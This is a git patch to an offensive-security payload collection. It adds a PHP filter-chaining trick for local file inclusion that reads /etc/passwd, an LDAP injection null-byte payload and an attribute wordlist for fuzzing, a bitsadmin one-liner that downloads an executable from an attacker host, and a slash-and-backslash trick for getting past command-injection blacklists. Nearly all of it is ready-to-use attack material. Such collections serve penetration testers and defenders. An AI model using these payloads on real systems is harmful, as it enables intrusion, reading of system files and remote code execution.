From 6bcb43e39cc84cd691257b80a35b66fb10ce5496 Mon Sep 17 00:00:00 2001
From: Swissky <swisskysec@protonmail.com>
Date: Fri, 2 Nov 2018 13:50:56 +0100
Subject: [PATCH] LDAP fix typo + LDAP attributes + LFI filter chaining

---
 File Inclusion - Path Traversal/README.md     |  2 ++
 LDAP injection/Intruders/LDAP_FUZZ.txt        |  1 +
 LDAP injection/Intruders/LDAP_attributes.txt  | 36 ++++++++++++++-----
 LDAP injection/README.md                      |  6 ++--
 .../Windows - Download and Execute.md         |  7 ++++
 Remote commands execution/README.md           |  3 +-
 6 files changed, 43 insertions(+), 12 deletions(-)

diff --git a/File Inclusion - Path Traversal/README.md b/File Inclusion - Path Traversal/README.md
index 375cbf7..e0cccdf 100644
--- a/File Inclusion - Path Traversal/README.md	
+++ b/File Inclusion - Path Traversal/README.md	
@@ -151,6 +151,8 @@ can be chained with a compression wrapper for large files.
 http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd
 ```
 
+NOTE: Wrappers can be chained : `php://filter/convert.base64-decode|convert.base64-decode|convert.base64-decode/resource=%s`
+
 ### Wrapper zip://
 
 ```python
diff --git a/LDAP injection/Intruders/LDAP_FUZZ.txt b/LDAP injection/Intruders/LDAP_FUZZ.txt
index 53b53e4..a32a116 100644
--- a/LDAP injection/Intruders/LDAP_FUZZ.txt	
+++ b/LDAP injection/Intruders/LDAP_FUZZ.txt	
@@ -29,6 +29,7 @@ x' or name()='username' or 'x'='y
 &
 (
 )
+)(cn=))\x00
 *(|(mail=*))
 *(|(objectclass=*))
 */*
diff --git a/LDAP injection/Intruders/LDAP_attributes.txt b/LDAP injection/Intruders/LDAP_attributes.txt
index 472a4ec..adc08bb 100644
--- a/LDAP injection/Intruders/LDAP_attributes.txt	
+++ b/LDAP injection/Intruders/LDAP_attributes.txt	
@@ -1,9 +1,27 @@
-userPassword 
-surname 
-name 
-cn 
-sn 
-objectClass 
-mail 
-givenName 
-commonName
\ No newline at end of file
+c
+cn
+co
+commonName
+dc
+facsimileTelephoneNumber
+givenName
+gn
+homePhone
+id
+jpegPhoto
+l
+mail
+mobile
+name
+o
+objectClass
+ou
+owner
+pager
+password
+sn
+st
+surname
+uid
+username
+userPassword
diff --git a/LDAP injection/README.md b/LDAP injection/README.md
index 8e33621..cdf5cec 100644
--- a/LDAP injection/README.md	
+++ b/LDAP injection/README.md	
@@ -26,6 +26,7 @@ query = (&(uid=admin)(!(&(1=0)(userPassword=q))))
 *
 *)(&
 *))%00
+)(cn=))\x00
 *()|%26'
 *()|&'
 *(|(mail=*))
@@ -84,7 +85,7 @@ commonName
 
 ## Exploiting userPassword attribute
 
-userPassword’ attribute in not a string like the ‘cn’ attribute for example but it’s an OCTET STRING
+`userPassword` attribute is not a string like the `cn` attribute for example but it’s an OCTET STRING
 In LDAP, every object, type, operator etc. is referenced by an OID : octetStringOrderingMatch (OID 2.5.13.18).
 
 > octetStringOrderingMatch (OID 2.5.13.18): An ordering matching rule that will perform a bit-by-bit comparison (in big endian ordering) of two octet string values until a difference is found. The first case in which a zero bit is found in one value but a one bit is found in another will cause the value with the zero bit to be considered less than the value with the one bit.
@@ -99,4 +100,5 @@ userPassword:2.5.13.18:=\xx\xx\xx
 
 * [OWASP LDAP Injection](https://www.owasp.org/index.php/LDAP_injection)
 * [LDAP Blind Explorer](http://code.google.com/p/ldap-blind-explorer/)
-* [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN](https://0xukn.fr/posts/WriteUpECW2018AdmYSsion/)
\ No newline at end of file
+* [ECW 2018 : Write Up - AdmYSsion (WEB - 50) - 0xUKN](https://0xukn.fr/posts/WriteUpECW2018AdmYSsion/)
+* [Quals ECW 2018 - Maki](https://maki.bzh/courses/blog/writeups/qualecw2018/)
\ No newline at end of file
diff --git a/Methodology and Resources/Windows - Download and Execute.md b/Methodology and Resources/Windows - Download and Execute.md
index a675f8a..8e66c90 100644
--- a/Methodology and Resources/Windows - Download and Execute.md	
+++ b/Methodology and Resources/Windows - Download and Execute.md	
@@ -94,6 +94,13 @@ certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil
 certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
 ```
 
+## Bitsadmin
+
+```powershell
+bitsadmin /transfer mydownloadjob /download /priority normal http://<attackerIP>/xyz.exe C:\\Users\\%USERNAME%\\AppData\\local\\temp\\xyz.exe
+```
+
+
 ## Thanks to
 
 - [arno0x0x - Windows oneliners to download remote payload and execute arbitrary code](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
diff --git a/Remote commands execution/README.md b/Remote commands execution/README.md
index 6e78268..a6717e9 100644
--- a/Remote commands execution/README.md	
+++ b/Remote commands execution/README.md	
@@ -87,10 +87,11 @@ Bypass blacklisted word with double quote
 w"h"o"am"i
 ```
 
-Bypass blacklisted word with backslash
+Bypass blacklisted word with backslash and slash
 
 ```powershell
 w\ho\am\i
+/\b\i\n/////s\h
 ```
 
 Bypass blacklisted word with $@